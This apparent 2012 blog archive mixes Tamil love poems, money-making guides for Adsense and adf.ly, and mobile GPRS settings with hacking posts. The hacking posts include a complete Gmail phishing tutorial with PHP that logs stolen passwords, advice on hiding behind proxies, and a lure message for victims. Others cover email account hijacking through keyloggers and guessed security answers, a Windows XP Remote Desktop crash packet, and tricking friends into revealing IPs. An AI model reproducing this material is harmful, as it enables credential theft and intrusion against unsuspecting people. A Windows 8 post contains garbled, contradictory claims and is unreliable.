Monday, April 30, 2012

முப்பொழுதும் உன் கற்பனையே...

உன் கருவிழியில் கருவாக 
என் காதலானது கண்டேன் 
கச்சிதமாய் பிடித்துக்கொண்டாய் 
என் நெஞ்சத்தை...

எல்லாம் நேர் மாறாக நடக்கிறது 
நேரமும் நெடு நாளாய் அதே 
நாளிகையை காட்டுகிறது... 
பகலும் இரவானது 
இரவும் பகலானது...

நெல் மணி போல் 
சிதறியது சிந்தனைகள் 
பங்கசு போல்
பற்றிக்கொண்டது 
சஞ்சலமும் பதற்றமும்...

உன்னை நினைக்கையில் 
பல்லியும் ஒலி எழுப்புகிறது... 
பால் நிலவும் கரைகிறது..

உணர்வாய் என்றும் நீதானே...!!

 
 
விழி சிந்தும் மழையில் 
இரத்தம் சிந்தியது என்னிதயம்...
மனது வாடிப் போன காயத்தால்....

உன் சுவாசம் மூச்சாய் 
என் இதயவறைகளில்....
மூச்சு திணறிப்போகிறேன் 
உன்னை நினைக்கையில்....

உன்னுள்ளே சிறைப்பட்டுப் 
போக நினைத்தவள் 
என்னுள்ளே அடைபட்டேன் 
உனைக் காணாமல்...

கவிதையைக் கண்ணீராய்


 
ஊரறியாப் பெண்மை 
உன்னை உணர வழி இல்லையே 
பெயரறியாக் கன்னி உன்னில் 
கலக்க வழி தேவையே ...

சுடிதார் சொர்க்கமுனை உயிரில்
சுமக்க வழி தேடியே
சுமப்பேன் என் கனவில் 
உன் நினைவுத் தொல்லையே ...

எனை நோக்கா உன் பார்வை 
எட்ட வழி புரியவே 
எட்டி நின்றே உனை ரசித்தேன் 
ஓரக் கண்ணால் கொஞ்சமே ...

காதல் வானில்

 
 
இளமனம்
சுகம் தேடி
கதல்வானில் பறக்குதடி...

நீ சொன்ன
ஒரு வார்த்தை
என்னை உயிர்வாழ சொல்லுதடி...

விடியாத
என் உலகம்
உன்பார்வை கண்டு விடியுதடி...

புரியாத
பல வினாக்களுக்கு
இன்று விடைதெரிந்து போனதடி.....

இருளிலும் விடிகின்ற நீ...

 
 
நிலவொன்று நடந்து வருகின்ற அதிசயமும்
அழியாத ஒவியமாய் என்னிதயத்தில்
அதன் பாதச்சுவடுகள் பதிந்து வருகின்ற
இனனோர் அதிசயமும் 
காதலில்தான் உள்ளதோ...?

வளர்பிறையும் தேய்பிறையும் - உனது
ஆரம்பத்தையும் முடிவையும் காட்டுகிறது
அதேபோல்தான் என்னை அழவைப்பதும்
சிரிக்கவைப்பதும் உனது இன்பமாய்யுள்ளதோ..?

என் கல்லறைவரை நீதான்

 
 
 
உணர்வாக என்னில் நீ 
நேசத்தை கொடுத்து
உனக்காக என் இதயத்தை 
முழுமையாக இடம் பிடித்து
உறங்காத பாசத்தை உன்னில் 
நான் தொடுக்க வைத்தாய்

என் ....... நீயானால்..!



என் வானில் நீ நிலவாய் இராதே..!
தேய்ந்து விடுவாய்..
என் செடியில் மலராதே..!
உதிர்ந்து விடுவாய்..

என் கண்ணில் கனவாகாதே..!
கலைந்து விடுவாய்..
என் இமையில் மையாகாதே..!
கண்ணீரில் கரைந்து விடுவாய்..

Windows XP Remote Desktop Dos Vulnerability










Vulnerable:
Microsoft Windows XP Professional
Microsoft Windows .NET Standard Server Beta 3

Non-vulnerable:
Microsoft Windows 2000 Server

Background:
Windows XP Professional has a remote denial of service attack when Remote Desktop is enabled. Remote Desktop is XP Professional's single-user RDP server (Terminal Services).

Discussion:
At the start of the protocol there is a negotiation of client and server graphics capabilities, in a packet called PDU Confirm Active. A block of 32 bytes in this packet allows the client to disable the drawing commands that it does not support.

One of these apparently controls whether the Pattern BLT command is sent. On Windows 2000 Server, disabling this command will make the server send bitmaps instead of Pattern BLT commands. However, Windows XP Professional apparently reboots when it tries to render patterns; since this happens while the login screen is being drawn, this does not require the client to have logged on or authenticated to the server. This applies to all versions of the protocol tested (RDP 4.0, 5.0 and 5.1), and it is also reproducible with Windows .NET Standard Server Beta 3.

Workaround:
Disable Remote Desktop (from Control Panel, System, Remote, Remote Desktop, deselect the option "Allow users to connect remotely to this computer").

Exploit:
Shown below is the unencrypted packet contents for the problematic PDU Confirm Active packet. The only change is from 01 to 00 on the line indicated.

c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01 4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00 03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00 00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05 00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00 2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00 <- was "2a 00 01 01" 00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00 00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00 00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00 00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00 0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00 0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00 0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00 fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00 fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01 40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00 01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00 14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00 00 0a 00 01

References:
Section 8.2.5 from T.128 Multipoint application sharing, Series T: Terminals for telematic services, ITU-T.

Wireless Hacking









Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step by step procerdure in wireless hacking can be explained with help of different topics as follows:-

1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

2) Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

3) Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

4) Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

5 ) Passive Scanning :- Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

6) Detection of SSID :- The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning

7) Collecting the MAC Addresses :- The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.

8) Collecting the Frames for Cracking WEP :- The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

9) Detection of the Sniffers :- Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

10) Wireless Spoofing :- There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

11) MAC Address Spoofing :- The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

12) IP spoofing :- Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

13) Frame Spoofing :- The attacker will inject frames that are valid but whose content is carefully spoofed.

14) Wireless Network Probing :- The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

15) AP Weaknesses :- APs have weaknesses that are both due to design mistakes and user interfaces

16) Trojan AP :- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

17) Denial of Service :- A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

18) Jamming the Air Waves :- A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.

19) War Driving :- Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.

Network Hacking




Network Hacking is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc.
It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools.

Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not.
To ping a particular host the syntax is (at command prompt)--
c:/>ping hostname.com
example:- c:/>ping www.google.com



Various attributes used with 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt.


Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc.
It's syntax is (at command prompt)--

c:/>netstat -n



Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port.
The basic syntax of Telnet is (at command prompt)--
c:/>telnet hostname.com
By default telnet connects to port 23 of remote computer.
So, the complete syntax is-

c:/>telnet www.hostname.com port
example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21


Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination.
It's syntax is (at command prompt)--
c:/>tracert www.hostname.com example:- c:/>tracert www.insecure.in




Here "* * * Request timed out." indicates that firewall installed on that system block the request and hence we can't obtain it's IP address.

various attributes used with tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt.

The information obtained by using tracert command can be further used to find out exact operating system running on target system.

இரும்பின் இதயம்



ஓராயிரம் வேலையிருந்தாலும் உன் கைகளால் பரிமாறும் ஒரு வாய் உணவிற்காக ஓடி வருவதும் இயல்பாய் வேண்டுமென்றே உன்னுடன் இழுக்கும் வாய்சண்டைகளும்...

கவிஞனாக்கினாய் என்னை!



கட்டழகி உன்னழகைக் கண்டதினாலென் கண்மீதே எனக்கின்று காதல்வந்தது பட்டுஇதழ் பட்டுவெளி வந்ததினால்என் பெயரும்கூட வெகுவாக இனிக்கின்றது காதலியாய் நானுன்னை பெற்றதினாலே ...

ஒரு உயிர்



என்ன
ஒரு வேதனை...?
ஒரு உயிர்...
இரண்டு உடல்களில் பிரிந்து
கிடக்கிறதே..?

How to Use Google Adsense




Google Adsense is an affiliate pay per click program that has taken the Internet by storm. There are a plethora of sites dedicated solely to Google Adsense. Google Adsense is a good way for a small Internet site owner to make some extra money. Using Adsense does not require any special knowledge, just a computer and a working web site.

 Instructions

        1.Construct a web site for use with Google Adsense. Google has a published criteria for the web sites they accept to the Adsense program. A good rule of thumb is just construct an honest and forthright web site that has legitimate purpose other than attaining revenue from the Google Adsense program.
        2.Sign up for the Google Adsense Program having the following information available during sign up: website URL, website language, name, address and telephone number.
        3.Submit the sign up information. Once all the steps at Google are complete and the policies are read, click the "Submit" button.
        4.Activate the Google Adsense account. Upon account approval, an email notification will arrive. Click on the link in the email to activate the Adsense account.
        5.Log in to the adsense account and obtain the HTML code for the approved site. Type in the username and password in the adsense log in box. Next click on the "Adsense setup" tab. Click on the "Adsense for content" link. Choose the "Ad unit" option in the next screen and select "Continue." And finally select the correct "Ad format" and then choose "Continue."
        6.Copy and paste the generated ad code into the appropriate section of the web site. In the grey Google adsense box there is HTML code to copy into the user web site. Copy that code and place in the appropriate place in the web site.

How to make money online with adf.ly



What is Adf.ly?
Adf.ly is an URL shortening service, such as bit.ly and goo.gl but with one little twist, you can make money from every link you create! Today there are plenty of websites out there that gives you the opportunity to shorten your links in order to make them more appealing or to hide where the link actually leads. However, there are only a few of them that you can make money online from and adf.ly is one of the best for just that. Later on in this article I will show you some the different ways that you can use to make money with adf.ly. While adf.ly is a great website you will most likely not make enough money from it to quit your day job, though it can build up over time and provide you with that money you need to start up your bigger projects online.

How does adf.ly work?
Adf.ly is simply a link shortening service that serves ads in every link that you create. For every ad in your links that someone sees you will make money. The ad shows for 5 seconds before you can click “skip ad” and continue to the links destination. The amount of money you make is about $0.5 to $4.7 per thousand views as I’m writing this article. Below are some ways on how to make money online with ad.ly.
Displaying interstitial ads
Displaying interstitial ads in your links is the highest paying alternative. If you shrink a link with an interstitial advertisement in it people will see full screen advertising before they can continue to the links destination. The advertisement lasts for 5 seconds before the alternative of skipping it becomes available for the viewer.
Using a framed banner
Using a framed banner is a less “painful” alternative for everyone that clicks on your link. This is because the ad will not take up the whole screen; instead it will only show a banner at the top of the browser. However, you will not make as much money with this alternative as you would have done by using interstitial ads.
Full page scripts
Even though I’d advice not to use full page scripts it is still a service offered by adf.ly. Full page scripts is a code snippet that you place in your websites code to change all of your links to adf.ly links. Doing so will make your users have to watch an ad every time they click on a link at your website. Sure, if you have thousand of visitors per day you can make some money with this, but you will most likely piss of everyone trying to browse your website.
Get referrals to do the hard work
If you do not want to do the hard work yourself then get some “slaves” to do the work for you. Adf.ly has a referral program that grants you 20% of your referrals earnings for life. So if you’re a famous person or has a great way to get referrals online this is for you. If you get about 100 referrals that are all making about $1 per month this will automatically get $20 per month without any work. It may not seem like a lot but money quickly adds up and if you have any good idea on how to get people to click on your own links you could be earning well over $50 per month simply by creating links. If you run a website or blog you could simply put up one of their banners on your site and if anyone clicks on them and signs up you will get a referral.

Making money with Adf.ly
Finally I’m getting to the point! I suppose you mainly came here to get ideas on how to make money with adf.ly and therefore I am going to list a few ways that I made my first $50 with when I used adf.ly.
Post on forums
If you know how a forum works then you will also know that there are plenty of forums out there that gets millions of views every month with hundreds of thousands members. Let’s say you know where to fins great Photoshop graphics, so you sign up with a design forum. You then create an adf.ly link to these graphics (it could be anything from Photoshop brushes to logo designs). Then you cleverly create a thread on the forum saying something like “Free logo designs for your website” with a little bit information and maybe some pictures of the logos inside. Then you place your Adf.ly link in the thread and say that they can download them from that site. If you do this actively you can get thousands of clicks on your links each day. This can be done in various forums, as long as you have something that the rest of the users want, for example eBooks, software, videos and so on.
Create videos on YouTube
YouTube is a great way to make money online and it even works with Adf.ly in some cases. If you know how to make videos you could create a video about a new software or song and then simply say that the link to download it is in the description. Since the video will most likely constantly get traffic you can duplicate this process and create many videos. In the end you might get thousands of clicks on your links every day on autopilot. And the more videos you upload, the more money you will make.
Everyday linking to things
If you’re active at websites such as twitter, facebook or similar websites you can easily make some money online from them. In the end, the more links you create the more you will earn, just post them on highly trafficked websites. The links will most likely stay forever and you will earn residual money from them forever. Though, you should not overdo this, putting links in instant messenger chats gives little to no money and only wastes time for you and the one clicking the link.

Great extra features of Adf.ly
Adf.ly is a great website and there are some things that make it this great. One of those things is the interface it has, it’s simple to navigate and understand even for new users. Adf.ly also has a forum where you can talk with admins and other members; this is a great way to see that the website is not a scam. When you create a link with their service you can use one of the worlds shortest URL’s: u.bb and 9.bb, so you’re not just limited to using the adf.ly shortening. You also get very detailed statistics from every link you create, such as the earnings, amount of clicks and from where in the world someone clicked on your links. But the best thing is that the payout is as low as $5, this means that you can reach your payout limit easily if you just put some effort in spreading your links online

Join Now





Gmail Phishing

 

How to create fake or Phishing web page for gmail?


 This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.

Steps for Creating Phishing or Fake web Page:

Step 1:
Go to the gmail.com.  Save the Page as "complet HTML" file

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

Step3:
 Upload those image to tinypic or photobucker.com.  copy the url of each image.

Step4:
Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5:
Search for the

 action="https://www.google.com/accounts/ServiceLoginAuth"

Replace it with

action="http://yoursite urlhere/login.php"

 save the file.
Step6:
Now you need to create login.php
 so you need to open the notepad and type as

<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save it

Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.


Step 8: 
create an email with gmail keyword.
 like : gmailburger@gmail.com

Step 9:
  Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.

Different types of Email Account Hacking





The Basic level Hacking is Email Account Hacking. Everyone like to do first email account hacking only. So here is the tutorial for budding hackers about email Hacking.



There are different types of Email Account Hacking . Here is some of them :
Social Engineering
Phishing
Brute Force Attack
Keylogger
Guessing the Answer for the Security Question



Social Engineering:

Social engineering takes advantage of the weakest link in any organization’s
information security defenses: people. Social engineering is
“people hacking” and involves maliciously exploiting the trusting nature of
human beings to obtain information that can be used for personal gain.

Social engineering is one of the toughest hacks to perpetrate because it takes
great skill to come across as trustworthy to a stranger. It’s also by far the
toughest hack to protect against because people are involved.

Social Engineering is different from Physical Security exploits . In social engineering hackers will analyze about
victim. Hackers will send mail to victim. The contents will be related to the victim.

Eg:

✓ False support personnel claim that they need to install a patch or new
version of software on a user’s computer, talk the user into downloading
the software, and obtain remote control of the system.
✓ False vendors claim to need to update the organization’s accounting
package or phone system, ask for the administrator password, and
obtain full access.
✓ Phishing e-mails sent by external attackers gather user IDs and passwords
of unsuspecting recipients. Hackers then use those passwords to
gain access to bank accounts and more. A related attack exploits crosssite
scripting on Web forms.
✓ False employees notify the security desk that they have lost their keys
to the computer room, receive a set of keys from security, and obtain
unauthorized access to physical and electronic information.

Phishing WebPage:

It is a fake webpage which looks similar to the original page of the website. Using this WebPage we can easily get the Password of victims. The process involved in creating Phishing webpage are,
✓ First Visit the Website which is associated with the email id. Copy the Source code.
✓ Edit the the Source code such that it will store the password for you.
✓ Upload the Webpage to any free webhosting sites. (don't select a famous hosting site,they will find that
your page is fake). Try uploading through the proxy server.

Guessing the Answer for Security Question:
Do you remember that the mail sites will ask for the security questions to retrieve the mail account? You can hack the mail account simply guessing the answer. If the victim is your friend ,then it may very easy to hack.

Brute Force Attack:



A famous and traditional attacking method . In this method ,the password will be found by trying all possible passwords with any program or software.




Keyloggers:


It is one of the spyware which will capture what you type in the keyboard. so whenever you type the username and password ,it will simply capture.

It is software program which will be attached with any softwares and send to victim. While victim install the software ,the keylogger also start to work. Keyloggers are exe files.





Windows 8 Beta Release Date



There has been a lot of speculation about release date of the Windows 8 Beta. Well, it would be good to say that perhaps only the developers of the Windows 8 Beta project know the exact date so far. Experts fear that even internal people of Microsoft are not sure about it.

However, it was reported that Dan’l Lewin, the Corporate Vice President for Strategic and Emerging Business Development of the company, hinted that Windows 8 could be released in autumn, 2012. He announced this during event launch of the Microsoft Silicon Valley Campus. Microsoft’s President Steven Sinofsky in his blog also shared information about Windows 8 Beta’s release.
Microsoft traditionally launched something new for Windows within a span of 3 to 4 years. It can be assumed that Microsoft might want to launch Windows 8 Beta as a follow up version of Linux that has already gained a huge popularity.
One thing is clear that the release team of Microsoft will not announce any definite date for release unless its developers working on the project give green signal to them. Before announcing the date there will be several meetings between development unit, marketing team and all other units of the company.

The whole market and users are eagerly waiting for its release to see how far it has changed from its renowned predecessors. To be very honest, earlier versions of Beta are really problematic but it fulfilled peoples’ expectations to a great extent. In fact, it’s better to say that no one should expect more from a beta version OS than that.
Getting back to release date of Windows 8 Beta, all must realize that the official announcement will be made only when Microsoft will feel satisfied with the whole development work. However, marketers expect that the official announcement might come somewhere around mid or last half of 2011.
Different people are speculating different dates for its launch. Some websites event mentioned a few specific dates for release as well but market insiders have refuted all these as rumors. Remember, it’s not good to speculate too much and make wild guessing all the time. Actually, people have lost patience waiting all this while for Windows 8 Beta.


Easy YouTube Video Downloader



Users often get confused when it comes to select an easy downloader for downloading videos from YouTube. Here is some of the most favorite and easiest YouTube downloader for you, if you are one of them.

Easy YouTube Video Downloader 5.4    

This has been originally developed by the Alactro LLC. This is the easiest YouTube downloader ever. Users just need to click on the download buttons for FLV, AAC, MP4, Mp3, 720p HD and 1080p Full-HD qualities. This will soon support the 3GP format too.

Features

  • MP3 conversion speed is very fast
  • You get the HD download link only when the high-definition version of the current video is available
  • Latest version of 3.0 works perfectly with the YouTube layout
  • Works within the page
  • Supports all new 1080p FULL-HD video downloading
  • Video-title as file-name
Download Now 



Vodafone GPRS Manual Settings

How to Get Vodafone GPRS Manual Settings
When in a handset as you insert SIM card then automatically you will get GPRS settings and that you have to save. If one is unable to save, then by sending SMS “VL” on 52586 these can be again retrieve. Vodafone GPRS settings will be delivered to your mobile only if in the Vodafone system your cell phone is recognized.
If it doesn’t recognize then one needs to confirm the device by dialing to customer care.  Sometimes to connect internet via GPRS seems difficult and the reason behinds is installation of wrong GPRS settings, one need to install correct settings. You can dial to Vodafone call center or can check manually by yourself.
To manually configure free GPRS on your mobile device you need to set perfect required configuration settings for the specific handset. As the Proxy Port differs from state to state one need to conform it from the Vodafone customer care.
Here is the specific chart below to manually configure free Vodafone GPRS on your mobile follow the instructions given below

For Samsung Phones:

Menu > Funbox > WAP Browser
Then go to settings > Choose the profile.
In the profile, you would get the different fields to be filled:
Profile name: Vodafone live!
URL:http://live.vodafone.in
Security: Non-secure
Bearer: GPRS
IP address: 10.10.1.100
Username: < blank>
Password: < blank>
APN: portalnmms

For Nokia phones:

Profile name: Vodafone live
URL: http://live.vodafone.in
Security: Non-secure
There is no charge for activating Vodafone live!
Bearer: GPRS
IP address: 10.10.1.100
Username: _< blank>
Password: < blank>
APN: portalnmms

Airtel GPRS Settings




The Airtel GPRS setting can be done by just sending one SMS to the service provider, or can be manually set by using Airtel’s Mobile Office settings. To activate the Airtel GPRS settings in your mobile phone, you must first activate the Mobile Office settings from the carrier.


Activate Default Airtel GPRS Settings

  • To activate this setting first I must send SMS as “MO” to 2567 which is toll free.
  • Then within a few minutes or some the person will receive the setting for his mobile.
  • Then to activate the Airtel GPRS settings the person should send SMS as “GPRSACT” to 511 which is toll free number.
  • To use this type of service in Airtel the person should maintain a minimum balance of Rs.15 because it is being charged as Rs.15 per day.

Manual Settings for Airtel GPRS
In mobile the settings are being made by using the following steps:
  • Set the Homepage as any page you want to set.
  • Set the User Name as blank
  • Set the Password as blank
  • Set the Proxy should be enabled as yes.
  • Make the Proxy and Server address as 202.56.231.117 and also the Proxy and Server Port as 8080
  • Change the Data bearer to GPRS or Packet Data.
  • Make the Access Point Name as airtelgprs.com.
  • Change the Authentication Type to Normal.
  • Do not prefer any access point.
The person can do all kinds of settings only when the mobile office setting is activated in the mobile he/she is using.


Deactivate Airtel GPRS

To deactivate the settings the person has to send SMS as “GPRSDEACT” to the same toll free number 511.
These are all the procedures to get the Airtel GPRS setting directly to the persons mobile. If you still have any kinds of problem just dial 121 from the Airtel mobile.




How to find a remote IP

 
Method 1

To view someone's IP# when they send you hotmail email do this:
1) Click "Options" on the upper right side of the page.
2) On the left side of the page, Click "Mail"
3) Click "Mail Display Settings"
4) Under "Message Headers" select "Full" or "Advanced"
5) Click ok


Method 2

reg a dydns account and install the ip pointer, so each time you ping the host name you regestored


for example:
you regestor the host name myhost.dydns.com, then you keep a little software running on the target host. The little software will keep update your IP to dydns.com server.


so at your pc just start cmd, and ping myhost.dydns.com, it will give you the most updated ip address.


Method 3

neverender, what doesn't work for you? Simply type in nc -vvv -l -p 80 on your box, which will set it to listen in verbose mode on port 80. Then give them a link to your IP address (for example: 111.111.111.11) and tell them to type it in their browser. The browser should resolve the address as well as append port 80 automatically. Just make sure that your friend is not very computer literate.


Method 4

Just download a very simple server such as this one and install it on your comp. Then run it and give your ip to the person you want and tell them to connect to it through a browser. Your server will log their connection and you will get their IP.


link:http://www.download.com/Abyss-Web-Server/3000-2165-10283992.html?tag=lst-0-6




Other Ways

-www.imchaos.com and make a "spy poll" to put in ur profile, this will tell u the IP of anybody who answers ur poll
-originalicons.com there is a page for doin it (i dont like it, but it works)
-or irc




Here is a more detailed tutorial about using NetCat.


http://www.onlamp.com/pub/a/onlamp/2003/05/29/netcat.html


Windows users can download NetCat from here:


http://www.atstake.com/research/tools/network_utilities/